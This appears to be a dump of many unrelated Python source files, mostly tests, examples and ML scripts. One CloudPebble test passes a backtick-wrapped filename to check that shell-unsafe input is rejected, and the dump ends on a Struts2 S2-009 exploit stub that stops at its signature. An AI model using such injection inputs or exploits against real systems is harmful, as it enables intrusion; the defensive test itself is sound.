Return option value of `processManagement.pidFilePath` if a yaml conf
and `pidFilePath` if a key-value pair conf.
"""
if self.is_yaml:
return self.get('processManagement', {}).get('pidFilePath')
else:
return self.get('pidfilepath')
@property
def syslog(self):
"""
Return option value of `systemLog.destination` if a yaml conf, this
can be 'file' or 'syslog'. Return value of `syslog` if a key-value pair
conf, 'true' means log to syslog.
Return None means value is not specified in configuration file.
"""
if self.is_yaml:
return self.get('systemLog', {}).get('destination')
else:
return self.get('syslog')
@property
def logpath(self):
"""
Return option value of `systemLog.path` if a yaml conf and `logpath`
if a key-value pair conf.
"""
if self.is_yaml:
return self.get('systemLog', {}).get('path')
else:
return self.get('logpath')
|
test/url_test.py | etrepum/py-nanoid | 256 | 12657779 | <filename>test/url_test.py
from unittest import TestCase
from nanoid.resources import alphabet
class TestURL(TestCase):
def test_has_no_duplicates(self):
for i in range(len(alphabet)):
self.assertEqual(alphabet.rindex(alphabet[i]), i)
def test_is_string(self):
self.assertEqual(type(alphabet), str)
|
ide/tests/test_source_api.py | Ramonrlb/cloudpebble | 147 | 12657791 | import json
import mock
from django.core.urlresolvers import reverse
from ide.utils.cloudpebble_test import CloudpebbleTestCase
from utils.fakes import FakeS3
__author__ = 'joe'
fake_s3 = FakeS3()
@mock.patch('ide.models.s3file.s3', fake_s3)
class TestSource(CloudpebbleTestCase):
"""Tests for the Tests models"""
def setUp(self):
self.login()
def create_file(self, name='file.c', content=None, target=None, success=True):
""" Create a source file """
url = reverse('ide:create_source_file', args=[self.project_id])
data = {}
if name is not None:
data['name'] = name
if content is not None:
data['content'] = content
if target is not None:
data['target'] = target
result = json.loads(self.client.post(url, data).content)
self.assertEqual(result['success'], success)
if success:
self.assertEqual(result['file']['name'], name)
self.assertEqual(result['file']['target'], target if target else 'app')
return result['file'] if 'file' in result else result
def load_file(self, id, success=True):
""" Load a source file's content """
url = reverse('ide:load_source_file', args=[self.project_id, id])
result = json.loads(self.client.get(url).content)
self.assertEqual(result['success'], success)
return result
def rename_file(self, id, modified, old_name=None, new_name=None, success=True):
""" Rename a source file """
url = reverse('ide:rename_source_file', args=[self.project_id, id])
data = {}
if old_name is not None:
data['old_name'] = old_name
if new_name is not None:
data['new_name'] = new_name
if modified is not None:
data['modified'] = modified
result = json.loads(self.client.post(url, data).content)
self.assertEqual(result['success'], success)
return result
def save_file(self, id, modified, content=None, folded_lines='[]', success=True):
""" Save new content to a source file """
data = {}
if content is not None:
data['content'] = content
if folded_lines is not None:
data['folded_lines'] = folded_lines
if modified is not None:
data['modified'] = modified
url = reverse('ide:save_source_file', args=[self.project_id, id])
result = json.loads(self.client.post(url, data).content)
self.assertEqual(result['success'], success)
return result
def get_source_names(self):
""" Get a list of project source file names """
project = json.loads(self.client.get(reverse('ide:project_info', args=[self.project_id])).content)
return {x['name'] for x in project['source_files']}
def test_create(self):
""" Test creating files in various valid states """
self.create_file("c_file.c")
self.create_file("js_file.js")
self.create_file("with_content.c", content="blah" * 100)
self.create_file("without_content.c", content=None)
self.create_file("worker.c", target='worker')
def test_create_load_save(self):
""" Test a full sequence of creating, loading, saving and re-loading a file"""
content = " Hello world ^^ "
new_content = "New content"
info = self.create_file(content=content)
loaded = self.load_file(info['id'])
self.assertEqual(content, loaded['source'])
self.save_file(info['id'], int(loaded['modified']), content=new_content)
loaded = self.load_file(info['id'])
self.assertEqual(new_content, loaded['source'])
def test_create_with_invalid_target_throws_error(self):
""" Test that attempting to create a file with an invalid target throws an error """
self.create_file(target='invalid', success=False)
def test_create_with_invalid_names_throws_error(self):
""" Check that attempts to create files with invalid names throw errors """
self.create_file("no_extension", success=False)
self.create_file("no_extension", success=False)
self.create_file("bad_extension.html", success=False)
self.create_file(".c", success=False)
self.create_file("`unsafe characters`.c", success=False)
def test_rename(self):
""" Check that files can be renamed """
name1 = "name1.c"
name2 = "name2.c"
info = self.create_file(name1)
loaded = self.load_file(info['id'])
self.rename_file(info['id'], int(loaded['modified']), name1, name2)
self.assertIn(name2, self.get_source_names())
def test_rename_outdated_file_fails(self):
""" Check that a file which was modified externally fails to rename """
name1 = "name1.c"
name2 = "name2.c"
info = self.create_file(name1)
loaded = self.load_file(info['id'])
self.rename_file(info['id'], int(loaded['modified'] - 5000), name1, name2, success=False)
self.assertIn(name1, self.get_source_names())
|
pygame_menu/examples/window_resize.py | ppizarror/pygame-menu | 419 | 12657795 | """
pygame-menu
https://github.com/ppizarror/pygame-menu
EXAMPLE - WINDOW RESIZE
Resize the menu when the window is resized.
License:
-------------------------------------------------------------------------------
The MIT License (MIT)
Copyright 2017-2021 <NAME>. @ppizarror
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software
is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
-------------------------------------------------------------------------------
"""
import pygame
import pygame_menu
pygame.init()
surface = pygame.display.set_mode((600, 400), pygame.RESIZABLE)
pygame.display.set_caption("Example resizable window")
menu = pygame_menu.Menu(
height=100,
theme=pygame_menu.themes.THEME_BLUE,
title='Welcome',
width=100
)
def on_resize() -> None:
"""
Function checked if the window is resized.
"""
window_size = surface.get_size()
new_w, new_h = 0.75 * window_size[0], 0.7 * window_size[1]
menu.resize(new_w, new_h)
print(f'New menu size: {menu.get_size()}')
menu.add.label('Resize the window!')
user_name = menu.add.text_input('Name: ', default='<NAME>', maxchar=10)
menu.add.selector('Difficulty: ', [('Hard', 1), ('Easy', 2)])
menu.add.button('Quit', pygame_menu.events.EXIT)
menu.enable()
on_resize() # Set initial size
if __name__ == '__main__':
while True:
events = pygame.event.get()
for event in events:
if event.type == pygame.QUIT:
pygame.quit()
break
if event.type == pygame.VIDEORESIZE:
# Update the surface
surface = pygame.display.set_mode((event.w, event.h),
pygame.RESIZABLE)
# Call the menu event
on_resize()
# Draw the menu
surface.fill((25, 0, 50))
menu.update(events)
menu.draw(surface)
pygame.display.flip()
|
tests/test_model_counting.py | dannyrohde/pydbantic | 124 | 12657805 | <gh_stars>100-1000
import pytest
from tests.models import EmployeeInfo
@pytest.mark.asyncio
async def test_model_counting(loaded_database_and_model):
db, Employees = loaded_database_and_model
all_employees = await Employees.all()
employee_count = await Employees.count()
print(f"Number of Employees is ", employee_count)
assert employee_count == len(all_employees)
employed = await Employees.filter(
is_employed=True
)
employed_count = await Employees.filter(
is_employed=True,
count_rows=True,
)
assert len(employed) == employed_count
un_employed = await Employees.filter(
is_employed=False,
count_rows=True
)
assert un_employed == 0
|
api/tests/integration/tests/rpe/rpe.py | tsingdao-Tp/Indigo | 204 | 12657813 | <filename>api/tests/integration/tests/rpe/rpe.py
import os
import sys
sys.path.append('../../common')
from env_indigo import *
from itertools import product
indigo = Indigo()
def getProduct(reaction):
for mol in reaction.iterateProducts():
return mol
return None
def loadSdf(sdf_path):
sdfiterator = indigo.iterateSDFile(sdf_path)
result = [m.clone() for m in sdfiterator]
sdfiterator.dispose()
return result
def buildRpeReactions(test_dir):
reaction = indigo.loadQueryReactionFromFile(joinPathPy(os.path.join("tests", test_dir, "reaction.rxn"), __file__))
mons = []
for i in range(reaction.countReactants()):
reactant_mons = loadSdf(joinPathPy(os.path.join("tests", test_dir, "mons{0}.sdf".format(i + 1)), __file__))
mons.append(reactant_mons)
return indigo.reactionProductEnumerate(reaction, mons)
def testRpe():
for test_dir in sorted(os.listdir(joinPathPy("tests", __file__))):
print("Test %s" % test_dir)
rpe_reactions = buildRpeReactions(test_dir)
products_smiles = []
for reaction in rpe_reactions.iterateArray():
rpe_product = getProduct(reaction)
rpe_csmiles = rpe_product.canonicalSmiles()
products_smiles.append(rpe_csmiles)
products_smiles.sort()
for prod_sm in products_smiles:
print(" %s" % prod_sm)
# make possible options combintation
opset = [
product(["rpe-multistep-reactions"], ["0", "1"]), # bug was caused by 1 \
product(["rpe-mode"], ["grid", "one-tube"]),
product(["rpe-self-reaction"], ["0", "1"]),
product(["rpe-max-depth"], ["1", "3"]),
product(["rpe-max-products-count"], ["4", "10"]) # 10 -> 100 very long \
]
# example with bug for test #9
# opset = [ [ ("rpe-multistep-reactions", "1") ] ]
opt_combintations = product(*opset)
print("Testing reaction products enumberator with different options")
for opt_set in opt_combintations:
print("\n*** Test set ***")
for opt_tuple in opt_set:
print(opt_tuple)
indigo.setOption(*opt_tuple)
testRpe()
|
perf/docker/prom_client.py | daixiang0/tools | 264 | 12657834 | # Copyright Istio Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from prometheus_client import start_http_server, Counter, Gauge
import logging
REQUESTS = Counter(
'stability_outgoing_requests',
'Number of requests from this service.',
['source', 'destination', 'succeeded']
)
RUNNING = Gauge(
'stability_test_instances',
'Is this test running',
['test']
)
def report_metrics():
start_http_server(8080)
def report_running(test):
RUNNING.labels(test).set_function(lambda: 1)
def attempt_request(f, source, destination, valid=None):
try:
response = f()
if not valid or valid(response):
succeeded = True
else:
succeeded = False
logging.error(
"Request from {} to {} had invalid response: {}".format(
source, destination, response))
REQUESTS.labels(source, destination, succeeded).inc()
return response, succeeded
except BaseException:
logging.exception("Request from {} to {} had an exception".format(
source,
destination
))
REQUESTS.labels(source, destination, False).inc()
return None, False
|
ImageArt/ImageColoring.py | shekkizh/TensorflowProjects | 204 | 12657835 | <gh_stars>100-1000
__author__ = 'Charlie'
"""Image coloring by fully convolutional networks - incomplete """
import numpy as np
import tensorflow as tf
import os, sys, inspect
from datetime import datetime
import scipy.misc as misc
lib_path = os.path.realpath(
os.path.abspath(os.path.join(os.path.split(inspect.getfile(inspect.currentframe()))[0], "..")))
if lib_path not in sys.path:
sys.path.insert(0, lib_path)
import TensorflowUtils as utils
FLAGS = tf.flags.FLAGS
tf.flags.DEFINE_string("data_dir", "Data_zoo/CIFAR10_data/", """Path to the CIFAR10 data""")
tf.flags.DEFINE_string("mode", "train", "Network mode train/ test")
tf.flags.DEFINE_string("test_image_path", "", "Path to test image - read only if mode is test")
tf.flags.DEFINE_integer("batch_size", "128", "train batch size")
tf.flags.DEFINE_string("logs_dir", "logs/ImageColoring_logs/", """Path to save logs and checkpoint if needed""")
DATA_URL = 'http://www.cs.toronto.edu/~kriz/cifar-10-binary.tar.gz'
LEARNING_RATE = 1e-3
MAX_ITERATIONS = 100001
NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN = 20000
IMAGE_SIZE = 32
def read_cifar10(filename_queue):
class CIFAR10Record(object):
pass
result = CIFAR10Record()
label_bytes = 1
result.height = IMAGE_SIZE
result.width = IMAGE_SIZE
result.depth = 3
image_bytes = result.height * result.width * result.depth
record_bytes = label_bytes + image_bytes
reader = tf.FixedLengthRecordReader(record_bytes=record_bytes)
result.key, value = reader.read(filename_queue)
record_bytes = tf.decode_raw(value, tf.uint8)
depth_major = tf.cast(tf.reshape(tf.slice(record_bytes, [label_bytes], [image_bytes]),
[result.depth, result.height, result.width]), tf.float32)
image = tf.transpose(depth_major, [1, 2, 0])
# extended_image = tf.reshape(image, (result.height, result.width, result.depth))
result.color_image = image
print result.color_image.get_shape()
print "Converting image to gray scale"
result.gray_image = 0.21 * result.color_image[ :, :, 2] + 0.72 * result.color_image[ :, :,
1] + 0.07 * result.color_image[ :, :, 0]
result.gray_image = tf.expand_dims(result.gray_image, 2)
print result.gray_image.get_shape()
return result
def get_image(image_dir):
image = misc.imread(image_dir)
image = np.ndarray.reshape(image.astype(np.float32), ((1,) + image.shape))
return image
def inputs():
data_dir = os.path.join(FLAGS.data_dir, 'cifar-10-batches-bin')
filenames = [os.path.join(data_dir, 'data_batch_%d.bin' % i) for i in xrange(1, 6)]
for f in filenames:
if not tf.gfile.Exists(f):
raise ValueError('Failed to find file: ' + f)
filename_queue = tf.train.string_input_producer(filenames)
read_input = read_cifar10(filename_queue)
num_preprocess_threads = 8
min_queue_examples = int(0.4 * NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN)
print "Shuffling"
input_gray, input_colored = tf.train.shuffle_batch([read_input.gray_image, read_input.color_image],
batch_size=FLAGS.batch_size,
num_threads=num_preprocess_threads,
capacity=min_queue_examples + 3 * FLAGS.batch_size,
min_after_dequeue=min_queue_examples)
input_gray = (input_gray - 128) / 255.0
input_colored = (input_colored - 128) / 255.0
return input_gray, input_colored
def inference(image):
W1 = utils.weight_variable_xavier_initialized([9, 9, 1, 32])
b1 = utils.bias_variable([32])
tf.histogram_summary("W1", W1)
tf.histogram_summary("b1", b1)
h_conv1 = tf.nn.relu(utils.conv2d_basic(image, W1, b1))
W2 = utils.weight_variable_xavier_initialized([3, 3, 32, 64])
b2 = utils.bias_variable([64])
tf.histogram_summary("W2", W2)
tf.histogram_summary("b2", b2)
h_conv2 = tf.nn.relu(utils.conv2d_strided(h_conv1, W2, b2))
W3 = utils.weight_variable_xavier_initialized([3, 3, 64, 128])
b3 = utils.bias_variable([128])
tf.histogram_summary("W3", W3)
tf.histogram_summary("b3", b3)
h_conv3 = tf.nn.relu(utils.conv2d_strided(h_conv2, W3, b3))
# upstrides
W4 = utils.weight_variable_xavier_initialized([3, 3, 64, 128])
b4 = utils.bias_variable([64])
tf.histogram_summary("W4", W4)
tf.histogram_summary("b4", b4)
h_conv4 = tf.nn.relu(utils.conv2d_transpose_strided(h_conv3, W4, b4))
W5 = utils.weight_variable_xavier_initialized([3, 3, 32, 64])
b5 = utils.bias_variable([32])
tf.histogram_summary("W5", W5)
tf.histogram_summary("b5", b5)
h_conv5 = tf.nn.relu(utils.conv2d_transpose_strided(h_conv4, W5, b5))
W6 = utils.weight_variable_xavier_initialized([9, 9, 32, 3])
b6 = utils.bias_variable([3])
tf.histogram_summary("W6", W6)
tf.histogram_summary("b6", b6)
pred_image = tf.nn.tanh(utils.conv2d_basic(h_conv5, W6, b6))
return pred_image
def loss(pred, colored):
rmse = tf.sqrt(2 * tf.nn.l2_loss(tf.sub(colored, pred))) / FLAGS.batch_size
tf.scalar_summary("RMSE", rmse)
return rmse
def train(loss_val, step):
learning_rate = tf.train.exponential_decay(LEARNING_RATE, step, 0.4 * MAX_ITERATIONS, 0.99)
train_op = tf.train.AdamOptimizer(learning_rate).minimize(loss_val, global_step=step)
return train_op
def main(argv=None):
utils.maybe_download_and_extract(FLAGS.data_dir, DATA_URL, is_tarfile=True)
print "Setting up model..."
global_step = tf.Variable(0,trainable=False)
gray, color = inputs()
pred = 255 * inference(gray) + 128
tf.image_summary("Gray", gray, max_images=1)
tf.image_summary("Ground_truth", color, max_images=1)
tf.image_summary("Prediction", pred, max_images=1)
image_loss = loss(pred, color)
train_op = train(image_loss, global_step)
summary_op = tf.merge_all_summaries()
with tf.Session() as sess:
print "Setting up summary writer, queue, saver..."
sess.run(tf.initialize_all_variables())
summary_writer = tf.train.SummaryWriter(FLAGS.logs_dir, sess.graph)
saver = tf.train.Saver()
ckpt = tf.train.get_checkpoint_state(FLAGS.logs_dir)
if ckpt and ckpt.model_checkpoint_path:
print "Restoring model from checkpoint..."
saver.restore(sess, ckpt.model_checkpoint_path)
tf.train.start_queue_runners(sess)
for step in xrange(MAX_ITERATIONS):
if step % 400 == 0:
loss_val, summary_str = sess.run([image_loss, summary_op])
print "Step %d, Loss: %g" % (step, loss_val)
summary_writer.add_summary(summary_str, global_step=step)
if step % 1000 == 0:
saver.save(sess, FLAGS.logs_dir + "model.ckpt", global_step=step)
print "%s" % datetime.now()
sess.run(train_op)
if __name__ == "__main__":
tf.app.run()
|
rfhub/blueprints/__init__.py | datakurre/robotframework-hub | 156 | 12657867 | <filename>rfhub/blueprints/__init__.py<gh_stars>100-1000
from rfhub.blueprints.api import blueprint as api
from rfhub.blueprints.dashboard import blueprint as dashboard
from rfhub.blueprints.doc import blueprint as doc
|
tests/app/no_metadata.py | sandutsar/voila | 2,977 | 12657870 | import pytest
NOTEBOOK_PATH = 'no_metadata.ipynb'
@pytest.fixture
def non_existing_notebook_metadata(base_url):
return base_url + f'voila/render/{NOTEBOOK_PATH}'
@pytest.fixture
def voila_args(notebook_directory, voila_args_extra):
return ['--VoilaTest.root_dir=%r' % notebook_directory] + voila_args_extra
async def test_non_existing_metadata(
http_server_client, non_existing_notebook_metadata
):
response = await http_server_client.fetch(non_existing_notebook_metadata)
assert response.code == 200
assert 'Executing without notebook metadata' in response.body.decode('utf-8')
|
tests/opytimizer/optimizers/science/test_mvo.py | anukaal/opytimizer | 528 | 12657875 | <filename>tests/opytimizer/optimizers/science/test_mvo.py
import numpy as np
from opytimizer.optimizers.science import mvo
from opytimizer.spaces import search
def test_mvo_params():
params = {
'WEP_min': 0.2,
'WEP_max': 1.0,
'p': 0.5
}
new_mvo = mvo.MVO(params=params)
assert new_mvo.WEP_min == 0.2
assert new_mvo.WEP_max == 1.0
assert new_mvo.p == 0.5
def test_mvo_params_setter():
new_mvo = mvo.MVO()
try:
new_mvo.WEP_min = 'a'
except:
new_mvo.WEP_min = 0.75
try:
new_mvo.WEP_min = -1
except:
new_mvo.WEP_min = 0.75
assert new_mvo.WEP_min == 0.75
try:
new_mvo.WEP_max = 'b'
except:
new_mvo.WEP_max = 0.9
try:
new_mvo.WEP_max = 0.1
except:
new_mvo.WEP_max = 0.9
try:
new_mvo.WEP_max = -1
except:
new_mvo.WEP_max = 0.9
assert new_mvo.WEP_max == 0.9
try:
new_mvo.p = 'c'
except:
new_mvo.p = 0.25
try:
new_mvo.p = -1
except:
new_mvo.p = 0.25
assert new_mvo.p == 0.25
def test_mvo_update():
def square(x):
return np.sum(x**2)
new_mvo = mvo.MVO()
search_space = search.SearchSpace(n_agents=2, n_variables=2,
lower_bound=[1, 1], upper_bound=[10, 10])
new_mvo.update(search_space, square, 1, 10)
new_mvo.update(search_space, square, 5, 10)
|
dev/examples/snapswig-check.py | Cam2337/snap-python | 242 | 12657904 | #!/usr/bin/python
# test-bfsdfs.py
#
# Author: <NAME>, Spring 2013
# Description:
# - Loads SNAP as a Python module.
# - Performs mini unit tests for the following functions:
# - gviz (graph visualization, using Gnuplot)
# - bfsfdfs (Breadth First Search)
import sys
sys.path.append("../swig-r")
import snap
import os
import unittest
def GVizTest(NNodes, NEdges):
Graph = snap.GenRndGnm(NNodes, NEdges, 1)
FName = "test.png"
snap.DrawGViz(Graph, 1, snap.TStr(FName),
snap.TStr("Snap Ringo Dot"), 1)
return os.path.exists(FName)
def BfsDfsTest(NNodes, NEdges):
Graph = snap.GenRndGnm(NNodes, NEdges, 1)
snap.GetBfsTree(Graph, False, False, 1)
G2 = snap.GetBfsTree(Graph, False, False, 1)
return G2
class GVizTests(unittest.TestCase):
def testOne(self):
NNodes, NEdges = (15, 25)
self.failUnless(GVizTest(NNodes, NEdges))
def testTwo(self):
NNodes, NEdges = (8242, 12424)
G = BfsDfsTest(NNodes, NEdges)
self.assertEqual(NNodes == G.GetNodes(), NEdges == G.GetEdges())
def main():
unittest.main()
if __name__ == "__main__":
main()
|
data_management/importers/noaa_seals_2019.py | dnarqq/WildHack | 402 | 12657911 | <filename>data_management/importers/noaa_seals_2019.py
#%% Imports and constants
import os
import pandas as pd
from tqdm import tqdm
# from github.com/microsoft/ai4eutils
import url_utils
# from github.com/microsoft/cameratraps
from visualization import visualization_utils
# A list of files in the lilablobssc container for this data set
container_file_list = r'C:\temp\seals\seal_files.txt'
# The raw detection files provided by NOAA
detections_fn = r'C:\temp\seals\surv_test_kamera_detections_20210212.csv'
# A version of the above with filename columns added
detections_fn_full_paths = detections_fn.replace('.csv','_full_paths.csv')
base_url = 'https://lilablobssc.blob.core.windows.net/noaa-kotz'
#%% Read input .csv
df = pd.read_csv(detections_fn)
df['rgb_image_path'] = ''
df['ir_image_path'] = ''
print('Read {} rows from {}'.format(len(df),detections_fn))
camera_view_to_path = {}
camera_view_to_path['C'] = 'CENT'
camera_view_to_path['L'] = 'LEFT'
valid_flights = set(['fl04','fl05','fl06','fl07'])
#%% Read list of files
with open(container_file_list,'r') as f:
all_files = f.readlines()
all_files = [s.strip() for s in all_files]
all_files = set(all_files)
#%% Convert paths to full paths
missing_ir_files = []
# i_row = 0; row = df.iloc[i_row]
for i_row,row in tqdm(df.iterrows(),total=len(df)):
assert row['flight'] in valid_flights
assert row['camera_view'] in camera_view_to_path
assert isinstance(row['rgb_image_name'],str)
rgb_image_path = 'Images/{}/{}/{}'.format(row['flight'],camera_view_to_path[row['camera_view']],
row['rgb_image_name'])
assert rgb_image_path in all_files
df.loc[i_row,'rgb_image_path'] = rgb_image_path
if not isinstance(row['ir_image_name'],str):
continue
ir_image_path = 'Images/{}/{}/{}'.format(row['flight'],camera_view_to_path[row['camera_view']],
row['ir_image_name'])
# assert ir_image_path in all_files
if ir_image_path not in all_files:
missing_ir_files.append(ir_image_path)
df.loc[i_row,'ir_image_path'] = ir_image_path
# ...for each row
missing_ir_files = list(set(missing_ir_files))
missing_ir_files.sort()
print('{} missing IR files (of {})'.format(len(missing_ir_files),len(df)))
for s in missing_ir_files:
print(s)
#%% Write results
df.to_csv(detections_fn_full_paths,index=False)
#%% Load output file, just to be sure
df = pd.read_csv(detections_fn_full_paths)
#%% Render annotations on an image
import random; i_image = random.randint(0,len(df))
# i_image = 2004
row = df.iloc[i_image]
rgb_image_path = row['rgb_image_path']
rgb_image_url = base_url + '/' + rgb_image_path
ir_image_path = row['ir_image_path']
ir_image_url = base_url + '/' + ir_image_path
#%% Download the image
rgb_image_fn = url_utils.download_url(rgb_image_url,progress_updater=True)
ir_image_fn = url_utils.download_url(ir_image_url,progress_updater=True)
#%% Find all the rows (detections) associated with this image
# as l,r,t,b
rgb_boxes = []
ir_boxes = []
for i_row,row in df.iterrows():
if row['rgb_image_path'] == rgb_image_path:
box_l = row['rgb_left']
box_r = row['rgb_right']
box_t = row['rgb_top']
box_b = row['rgb_bottom']
rgb_boxes.append([box_l,box_r,box_t,box_b])
if row['ir_image_path'] == ir_image_path:
box_l = row['ir_left']
box_r = row['ir_right']
box_t = row['ir_top']
box_b = row['ir_bottom']
ir_boxes.append([box_l,box_r,box_t,box_b])
print('Found {} RGB, {} IR annotations for this image'.format(len(rgb_boxes),
len(ir_boxes)))
#%% Render the detections on the image(s)
img_rgb = visualization_utils.load_image(rgb_image_fn)
img_ir = visualization_utils.load_image(ir_image_fn)
for b in rgb_boxes:
# In pixel coordinates
box_left = b[0]; box_right = b[1]; box_top = b[2]; box_bottom = b[3]
assert box_top > box_bottom; assert box_right > box_left
ymin = box_bottom; ymax = box_top; xmin = box_left; xmax = box_right
visualization_utils.draw_bounding_box_on_image(img_rgb,ymin,xmin,ymax,xmax,
use_normalized_coordinates=False,
thickness=3)
for b in ir_boxes:
# In pixel coordinates
box_left = b[0]; box_right = b[1]; box_top = b[2]; box_bottom = b[3]
assert box_top > box_bottom; assert box_right > box_left
ymin = box_bottom; ymax = box_top; xmin = box_left; xmax = box_right
visualization_utils.draw_bounding_box_on_image(img_ir,ymin,xmin,ymax,xmax,
use_normalized_coordinates=False,
thickness=3)
visualization_utils.show_images_in_a_row([img_rgb,img_ir])
#%% Save images
img_rgb.save(r'c:\temp\seals_rgb.png')
img_ir.save(r'c:\temp\seals_ir.png')
#%% Clean up
import shutil
tmp_dir = os.path.dirname(rgb_image_fn)
assert 'ai4eutils' in tmp_dir
shutil.rmtree(tmp_dir)
|
notebook/dir_builtins.py | vhn0912/python-snippets | 174 | 12657912 | import pprint
print(type(dir(__builtins__)))
# <class 'list'>
print(len(dir(__builtins__)))
# 153
pprint.pprint(dir(__builtins__), compact=True)
# ['ArithmeticError', 'AssertionError', 'AttributeError', 'BaseException',
# 'BlockingIOError', 'BrokenPipeError', 'BufferError', 'BytesWarning',
# 'ChildProcessError', 'ConnectionAbortedError', 'ConnectionError',
# 'ConnectionRefusedError', 'ConnectionResetError', 'DeprecationWarning',
# 'EOFError', 'Ellipsis', 'EnvironmentError', 'Exception', 'False',
# 'FileExistsError', 'FileNotFoundError', 'FloatingPointError', 'FutureWarning',
# 'GeneratorExit', 'IOError', 'ImportError', 'ImportWarning', 'IndentationError',
# 'IndexError', 'InterruptedError', 'IsADirectoryError', 'KeyError',
# 'KeyboardInterrupt', 'LookupError', 'MemoryError', 'ModuleNotFoundError',
# 'NameError', 'None', 'NotADirectoryError', 'NotImplemented',
# 'NotImplementedError', 'OSError', 'OverflowError', 'PendingDeprecationWarning',
# 'PermissionError', 'ProcessLookupError', 'RecursionError', 'ReferenceError',
# 'ResourceWarning', 'RuntimeError', 'RuntimeWarning', 'StopAsyncIteration',
# 'StopIteration', 'SyntaxError', 'SyntaxWarning', 'SystemError', 'SystemExit',
# 'TabError', 'TimeoutError', 'True', 'TypeError', 'UnboundLocalError',
# 'UnicodeDecodeError', 'UnicodeEncodeError', 'UnicodeError',
# 'UnicodeTranslateError', 'UnicodeWarning', 'UserWarning', 'ValueError',
# 'Warning', 'ZeroDivisionError', '__IPYTHON__', '__build_class__', '__debug__',
# '__doc__', '__import__', '__loader__', '__name__', '__package__', '__spec__',
# 'abs', 'all', 'any', 'ascii', 'bin', 'bool', 'breakpoint', 'bytearray',
# 'bytes', 'callable', 'chr', 'classmethod', 'compile', 'complex', 'copyright',
# 'credits', 'delattr', 'dict', 'dir', 'display', 'divmod', 'enumerate', 'eval',
# 'exec', 'filter', 'float', 'format', 'frozenset', 'get_ipython', 'getattr',
# 'globals', 'hasattr', 'hash', 'help', 'hex', 'id', 'input', 'int',
# 'isinstance', 'issubclass', 'iter', 'len', 'license', 'list', 'locals', 'map',
# 'max', 'memoryview', 'min', 'next', 'object', 'oct', 'open', 'ord', 'pow',
# 'print', 'property', 'range', 'repr', 'reversed', 'round', 'set', 'setattr',
# 'slice', 'sorted', 'staticmethod', 'str', 'sum', 'super', 'tuple', 'type',
# 'vars', 'zip']
print(dir(__builtins__)[0])
# ArithmeticError
print(type(dir(__builtins__)[0]))
# <class 'str'>
pprint.pprint([s for s in dir(__builtins__) if s.islower() and not s.startswith('_')], compact=True)
# ['abs', 'all', 'any', 'ascii', 'bin', 'bool', 'breakpoint', 'bytearray',
# 'bytes', 'callable', 'chr', 'classmethod', 'compile', 'complex', 'copyright',
# 'credits', 'delattr', 'dict', 'dir', 'display', 'divmod', 'enumerate', 'eval',
# 'exec', 'filter', 'float', 'format', 'frozenset', 'get_ipython', 'getattr',
# 'globals', 'hasattr', 'hash', 'help', 'hex', 'id', 'input', 'int',
# 'isinstance', 'issubclass', 'iter', 'len', 'license', 'list', 'locals', 'map',
# 'max', 'memoryview', 'min', 'next', 'object', 'oct', 'open', 'ord', 'pow',
# 'print', 'property', 'range', 'repr', 'reversed', 'round', 'set', 'setattr',
# 'slice', 'sorted', 'staticmethod', 'str', 'sum', 'super', 'tuple', 'type',
# 'vars', 'zip']
pprint.pprint([s for s in dir(__builtins__) if s.endswith('Error')], compact=True)
# ['ArithmeticError', 'AssertionError', 'AttributeError', 'BlockingIOError',
# 'BrokenPipeError', 'BufferError', 'ChildProcessError',
# 'ConnectionAbortedError', 'ConnectionError', 'ConnectionRefusedError',
# 'ConnectionResetError', 'EOFError', 'EnvironmentError', 'FileExistsError',
# 'FileNotFoundError', 'FloatingPointError', 'IOError', 'ImportError',
# 'IndentationError', 'IndexError', 'InterruptedError', 'IsADirectoryError',
# 'KeyError', 'LookupError', 'MemoryError', 'ModuleNotFoundError', 'NameError',
# 'NotADirectoryError', 'NotImplementedError', 'OSError', 'OverflowError',
# 'PermissionError', 'ProcessLookupError', 'RecursionError', 'ReferenceError',
# 'RuntimeError', 'SyntaxError', 'SystemError', 'TabError', 'TimeoutError',
# 'TypeError', 'UnboundLocalError', 'UnicodeDecodeError', 'UnicodeEncodeError',
# 'UnicodeError', 'UnicodeTranslateError', 'ValueError', 'ZeroDivisionError']
pprint.pprint([s for s in dir(__builtins__) if s.endswith('Warning')], compact=True)
# ['BytesWarning', 'DeprecationWarning', 'FutureWarning', 'ImportWarning',
# 'PendingDeprecationWarning', 'ResourceWarning', 'RuntimeWarning',
# 'SyntaxWarning', 'UnicodeWarning', 'UserWarning', 'Warning']
print('len' in dir(__builtins__))
# True
|
misc/config_tools/board_inspector/extractors/helpers.py | donsheng/acrn-hypervisor | 848 | 12658033 | <filename>misc/config_tools/board_inspector/extractors/helpers.py
# Copyright (C) 2021 Intel Corporation. All rights reserved.
#
# SPDX-License-Identifier: BSD-3-Clause
#
import lxml
def add_child(element, tag, text=None, **kwargs):
child = lxml.etree.Element(tag)
child.text = text
for k,v in kwargs.items():
child.set(k, v)
element.append(child)
return child
def get_node(etree, xpath):
result = etree.xpath(xpath)
assert len(result) <= 1, "Internal error: cannot get texts from multiple nodes at a time"
return result[0] if len(result) == 1 else None
|
vulnscan/POC/struts2/struts2_009_poc.py | imfiver/Sec-Tools | 144 | 12658040 | import requests
# url随意
def poc(url):
